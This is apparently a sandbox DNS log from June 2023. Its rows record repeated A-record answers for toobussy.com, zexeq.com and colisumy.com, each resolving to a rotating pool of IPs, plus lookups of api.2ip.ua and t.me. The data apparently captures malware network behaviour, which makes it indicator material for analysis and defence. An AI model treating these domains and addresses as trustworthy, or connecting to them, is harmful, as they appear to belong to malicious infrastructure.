Jun 21, 2023 04:28:16.341337919 CEST	8.8.8.8	192.168.2.3	0xe9d8	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:16.341337919 CEST	8.8.8.8	192.168.2.3	0xe9d8	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:17.338202000 CEST	8.8.8.8	192.168.2.3	0xb0bc	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:17.338202000 CEST	8.8.8.8	192.168.2.3	0xb0bc	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:17.338202000 CEST	8.8.8.8	192.168.2.3	0xb0bc	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:17.338202000 CEST	8.8.8.8	192.168.2.3	0xb0bc	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:17.338202000 CEST	8.8.8.8	192.168.2.3	0xb0bc	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:17.338202000 CEST	8.8.8.8	192.168.2.3	0xb0bc	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:17.338202000 CEST	8.8.8.8	192.168.2.3	0xb0bc	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:17.338202000 CEST	8.8.8.8	192.168.2.3	0xb0bc	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:17.338202000 CEST	8.8.8.8	192.168.2.3	0xb0bc	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:17.338202000 CEST	8.8.8.8	192.168.2.3	0xb0bc	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:18.470072985 CEST	8.8.8.8	192.168.2.3	0x125	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:18.602200985 CEST	8.8.8.8	192.168.2.3	0xe6f4	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:18.602200985 CEST	8.8.8.8	192.168.2.3	0xe6f4	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:18.602200985 CEST	8.8.8.8	192.168.2.3	0xe6f4	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:18.602200985 CEST	8.8.8.8	192.168.2.3	0xe6f4	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:18.602200985 CEST	8.8.8.8	192.168.2.3	0xe6f4	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:18.602200985 CEST	8.8.8.8	192.168.2.3	0xe6f4	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:18.602200985 CEST	8.8.8.8	192.168.2.3	0xe6f4	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:18.602200985 CEST	8.8.8.8	192.168.2.3	0xe6f4	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:18.602200985 CEST	8.8.8.8	192.168.2.3	0xe6f4	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:18.602200985 CEST	8.8.8.8	192.168.2.3	0xe6f4	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:19.682779074 CEST	8.8.8.8	192.168.2.3	0x21d5	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:19.682779074 CEST	8.8.8.8	192.168.2.3	0x21d5	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:19.682779074 CEST	8.8.8.8	192.168.2.3	0x21d5	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:19.682779074 CEST	8.8.8.8	192.168.2.3	0x21d5	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:19.682779074 CEST	8.8.8.8	192.168.2.3	0x21d5	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:19.682779074 CEST	8.8.8.8	192.168.2.3	0x21d5	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:19.682779074 CEST	8.8.8.8	192.168.2.3	0x21d5	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:19.682779074 CEST	8.8.8.8	192.168.2.3	0x21d5	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:19.682779074 CEST	8.8.8.8	192.168.2.3	0x21d5	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:19.682779074 CEST	8.8.8.8	192.168.2.3	0x21d5	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.265886068 CEST	8.8.8.8	192.168.2.3	0xf5cb	No error (0)	zexeq.com	61.253.71.111	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.265886068 CEST	8.8.8.8	192.168.2.3	0xf5cb	No error (0)	zexeq.com	77.28.83.241	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.265886068 CEST	8.8.8.8	192.168.2.3	0xf5cb	No error (0)	zexeq.com	124.43.18.250	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.265886068 CEST	8.8.8.8	192.168.2.3	0xf5cb	No error (0)	zexeq.com	187.209.145.196	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.265886068 CEST	8.8.8.8	192.168.2.3	0xf5cb	No error (0)	zexeq.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.265886068 CEST	8.8.8.8	192.168.2.3	0xf5cb	No error (0)	zexeq.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.265886068 CEST	8.8.8.8	192.168.2.3	0xf5cb	No error (0)	zexeq.com	187.147.209.115	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.265886068 CEST	8.8.8.8	192.168.2.3	0xf5cb	No error (0)	zexeq.com	181.123.12.113	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.265886068 CEST	8.8.8.8	192.168.2.3	0xf5cb	No error (0)	zexeq.com	211.119.84.111	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.265886068 CEST	8.8.8.8	192.168.2.3	0xf5cb	No error (0)	zexeq.com	119.148.40.122	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.699642897 CEST	8.8.8.8	192.168.2.3	0x1b4c	No error (0)	astoriaresidency.com	103.233.24.19	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.812602043 CEST	8.8.8.8	192.168.2.3	0x1aab	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.812602043 CEST	8.8.8.8	192.168.2.3	0x1aab	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.812602043 CEST	8.8.8.8	192.168.2.3	0x1aab	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.812602043 CEST	8.8.8.8	192.168.2.3	0x1aab	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.812602043 CEST	8.8.8.8	192.168.2.3	0x1aab	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.812602043 CEST	8.8.8.8	192.168.2.3	0x1aab	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.812602043 CEST	8.8.8.8	192.168.2.3	0x1aab	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.812602043 CEST	8.8.8.8	192.168.2.3	0x1aab	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.812602043 CEST	8.8.8.8	192.168.2.3	0x1aab	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:20.812602043 CEST	8.8.8.8	192.168.2.3	0x1aab	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:21.916374922 CEST	8.8.8.8	192.168.2.3	0xb80c	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:21.916374922 CEST	8.8.8.8	192.168.2.3	0xb80c	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:21.916374922 CEST	8.8.8.8	192.168.2.3	0xb80c	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:21.916374922 CEST	8.8.8.8	192.168.2.3	0xb80c	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:21.916374922 CEST	8.8.8.8	192.168.2.3	0xb80c	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:21.916374922 CEST	8.8.8.8	192.168.2.3	0xb80c	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:21.916374922 CEST	8.8.8.8	192.168.2.3	0xb80c	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:21.916374922 CEST	8.8.8.8	192.168.2.3	0xb80c	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:21.916374922 CEST	8.8.8.8	192.168.2.3	0xb80c	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:21.916374922 CEST	8.8.8.8	192.168.2.3	0xb80c	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:22.758852959 CEST	8.8.8.8	192.168.2.3	0xfde9	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:22.758852959 CEST	8.8.8.8	192.168.2.3	0xfde9	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:22.758852959 CEST	8.8.8.8	192.168.2.3	0xfde9	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:22.758852959 CEST	8.8.8.8	192.168.2.3	0xfde9	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:22.758852959 CEST	8.8.8.8	192.168.2.3	0xfde9	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:22.758852959 CEST	8.8.8.8	192.168.2.3	0xfde9	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:22.758852959 CEST	8.8.8.8	192.168.2.3	0xfde9	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:22.758852959 CEST	8.8.8.8	192.168.2.3	0xfde9	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:22.758852959 CEST	8.8.8.8	192.168.2.3	0xfde9	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:22.758852959 CEST	8.8.8.8	192.168.2.3	0xfde9	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:23.651777983 CEST	8.8.8.8	192.168.2.3	0xc20	No error (0)	api.2ip.ua	162.0.217.254	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:23.858808994 CEST	8.8.8.8	192.168.2.3	0xe2d3	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:23.858808994 CEST	8.8.8.8	192.168.2.3	0xe2d3	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:23.858808994 CEST	8.8.8.8	192.168.2.3	0xe2d3	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:23.858808994 CEST	8.8.8.8	192.168.2.3	0xe2d3	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:23.858808994 CEST	8.8.8.8	192.168.2.3	0xe2d3	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:23.858808994 CEST	8.8.8.8	192.168.2.3	0xe2d3	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:23.858808994 CEST	8.8.8.8	192.168.2.3	0xe2d3	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:23.858808994 CEST	8.8.8.8	192.168.2.3	0xe2d3	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:23.858808994 CEST	8.8.8.8	192.168.2.3	0xe2d3	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:23.858808994 CEST	8.8.8.8	192.168.2.3	0xe2d3	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.092313051 CEST	8.8.8.8	192.168.2.3	0x28de	No error (0)	colisumy.com	37.34.248.24	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.092313051 CEST	8.8.8.8	192.168.2.3	0x28de	No error (0)	colisumy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.092313051 CEST	8.8.8.8	192.168.2.3	0x28de	No error (0)	colisumy.com	187.147.209.115	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.092313051 CEST	8.8.8.8	192.168.2.3	0x28de	No error (0)	colisumy.com	181.4.66.66	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.092313051 CEST	8.8.8.8	192.168.2.3	0x28de	No error (0)	colisumy.com	181.123.12.113	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.092313051 CEST	8.8.8.8	192.168.2.3	0x28de	No error (0)	colisumy.com	210.182.29.70	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.092313051 CEST	8.8.8.8	192.168.2.3	0x28de	No error (0)	colisumy.com	183.100.39.157	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.092313051 CEST	8.8.8.8	192.168.2.3	0x28de	No error (0)	colisumy.com	211.168.53.110	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.092313051 CEST	8.8.8.8	192.168.2.3	0x28de	No error (0)	colisumy.com	123.140.161.243	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.092313051 CEST	8.8.8.8	192.168.2.3	0x28de	No error (0)	colisumy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.816936016 CEST	8.8.8.8	192.168.2.3	0x81f3	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.816936016 CEST	8.8.8.8	192.168.2.3	0x81f3	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.816936016 CEST	8.8.8.8	192.168.2.3	0x81f3	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.816936016 CEST	8.8.8.8	192.168.2.3	0x81f3	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.816936016 CEST	8.8.8.8	192.168.2.3	0x81f3	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.816936016 CEST	8.8.8.8	192.168.2.3	0x81f3	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.816936016 CEST	8.8.8.8	192.168.2.3	0x81f3	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.816936016 CEST	8.8.8.8	192.168.2.3	0x81f3	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.816936016 CEST	8.8.8.8	192.168.2.3	0x81f3	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:24.816936016 CEST	8.8.8.8	192.168.2.3	0x81f3	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.687426090 CEST	8.8.8.8	192.168.2.3	0xb2ba	No error (0)	zexeq.com	77.28.83.241	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.687426090 CEST	8.8.8.8	192.168.2.3	0xb2ba	No error (0)	zexeq.com	124.43.18.250	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.687426090 CEST	8.8.8.8	192.168.2.3	0xb2ba	No error (0)	zexeq.com	187.209.145.196	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.687426090 CEST	8.8.8.8	192.168.2.3	0xb2ba	No error (0)	zexeq.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.687426090 CEST	8.8.8.8	192.168.2.3	0xb2ba	No error (0)	zexeq.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.687426090 CEST	8.8.8.8	192.168.2.3	0xb2ba	No error (0)	zexeq.com	187.147.209.115	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.687426090 CEST	8.8.8.8	192.168.2.3	0xb2ba	No error (0)	zexeq.com	181.123.12.113	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.687426090 CEST	8.8.8.8	192.168.2.3	0xb2ba	No error (0)	zexeq.com	211.119.84.111	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.687426090 CEST	8.8.8.8	192.168.2.3	0xb2ba	No error (0)	zexeq.com	119.148.40.122	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.687426090 CEST	8.8.8.8	192.168.2.3	0xb2ba	No error (0)	zexeq.com	61.253.71.111	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.788103104 CEST	8.8.8.8	192.168.2.3	0x37e1	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.788103104 CEST	8.8.8.8	192.168.2.3	0x37e1	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.788103104 CEST	8.8.8.8	192.168.2.3	0x37e1	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.788103104 CEST	8.8.8.8	192.168.2.3	0x37e1	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.788103104 CEST	8.8.8.8	192.168.2.3	0x37e1	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.788103104 CEST	8.8.8.8	192.168.2.3	0x37e1	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.788103104 CEST	8.8.8.8	192.168.2.3	0x37e1	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.788103104 CEST	8.8.8.8	192.168.2.3	0x37e1	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.788103104 CEST	8.8.8.8	192.168.2.3	0x37e1	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:25.788103104 CEST	8.8.8.8	192.168.2.3	0x37e1	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:26.735663891 CEST	8.8.8.8	192.168.2.3	0x751c	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:26.735663891 CEST	8.8.8.8	192.168.2.3	0x751c	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:26.735663891 CEST	8.8.8.8	192.168.2.3	0x751c	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:26.735663891 CEST	8.8.8.8	192.168.2.3	0x751c	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:26.735663891 CEST	8.8.8.8	192.168.2.3	0x751c	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:26.735663891 CEST	8.8.8.8	192.168.2.3	0x751c	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:26.735663891 CEST	8.8.8.8	192.168.2.3	0x751c	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:26.735663891 CEST	8.8.8.8	192.168.2.3	0x751c	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:26.735663891 CEST	8.8.8.8	192.168.2.3	0x751c	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:26.735663891 CEST	8.8.8.8	192.168.2.3	0x751c	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:27.717300892 CEST	8.8.8.8	192.168.2.3	0xe397	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:27.919398069 CEST	8.8.8.8	192.168.2.3	0xa264	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:27.919398069 CEST	8.8.8.8	192.168.2.3	0xa264	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:27.919398069 CEST	8.8.8.8	192.168.2.3	0xa264	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:27.919398069 CEST	8.8.8.8	192.168.2.3	0xa264	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:27.919398069 CEST	8.8.8.8	192.168.2.3	0xa264	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:27.919398069 CEST	8.8.8.8	192.168.2.3	0xa264	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:27.919398069 CEST	8.8.8.8	192.168.2.3	0xa264	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:27.919398069 CEST	8.8.8.8	192.168.2.3	0xa264	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:27.919398069 CEST	8.8.8.8	192.168.2.3	0xa264	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:27.919398069 CEST	8.8.8.8	192.168.2.3	0xa264	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:30.171313047 CEST	8.8.8.8	192.168.2.3	0xc271	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:30.171313047 CEST	8.8.8.8	192.168.2.3	0xc271	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:30.171313047 CEST	8.8.8.8	192.168.2.3	0xc271	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:30.171313047 CEST	8.8.8.8	192.168.2.3	0xc271	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:30.171313047 CEST	8.8.8.8	192.168.2.3	0xc271	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:30.171313047 CEST	8.8.8.8	192.168.2.3	0xc271	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:30.171313047 CEST	8.8.8.8	192.168.2.3	0xc271	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:30.171313047 CEST	8.8.8.8	192.168.2.3	0xc271	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:30.171313047 CEST	8.8.8.8	192.168.2.3	0xc271	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:30.171313047 CEST	8.8.8.8	192.168.2.3	0xc271	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:31.393853903 CEST	8.8.8.8	192.168.2.3	0xaa24	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:31.393853903 CEST	8.8.8.8	192.168.2.3	0xaa24	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:31.393853903 CEST	8.8.8.8	192.168.2.3	0xaa24	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:31.393853903 CEST	8.8.8.8	192.168.2.3	0xaa24	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:31.393853903 CEST	8.8.8.8	192.168.2.3	0xaa24	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:31.393853903 CEST	8.8.8.8	192.168.2.3	0xaa24	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:31.393853903 CEST	8.8.8.8	192.168.2.3	0xaa24	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:31.393853903 CEST	8.8.8.8	192.168.2.3	0xaa24	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:31.393853903 CEST	8.8.8.8	192.168.2.3	0xaa24	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:31.393853903 CEST	8.8.8.8	192.168.2.3	0xaa24	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:32.143527031 CEST	8.8.8.8	192.168.2.3	0x7461	No error (0)	toobussy.com	211.119.84.112	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:32.143527031 CEST	8.8.8.8	192.168.2.3	0x7461	No error (0)	toobussy.com	190.224.203.37	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:32.143527031 CEST	8.8.8.8	192.168.2.3	0x7461	No error (0)	toobussy.com	222.236.49.123	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:32.143527031 CEST	8.8.8.8	192.168.2.3	0x7461	No error (0)	toobussy.com	190.219.153.101	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:32.143527031 CEST	8.8.8.8	192.168.2.3	0x7461	No error (0)	toobussy.com	189.143.161.89	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:32.143527031 CEST	8.8.8.8	192.168.2.3	0x7461	No error (0)	toobussy.com	177.254.85.20	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:32.143527031 CEST	8.8.8.8	192.168.2.3	0x7461	No error (0)	toobussy.com	80.210.25.252	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:32.143527031 CEST	8.8.8.8	192.168.2.3	0x7461	No error (0)	toobussy.com	187.251.132.139	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:32.143527031 CEST	8.8.8.8	192.168.2.3	0x7461	No error (0)	toobussy.com	190.103.205.174	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:32.143527031 CEST	8.8.8.8	192.168.2.3	0x7461	No error (0)	toobussy.com	211.40.39.251	A (IP address)	IN (0x0001)	false
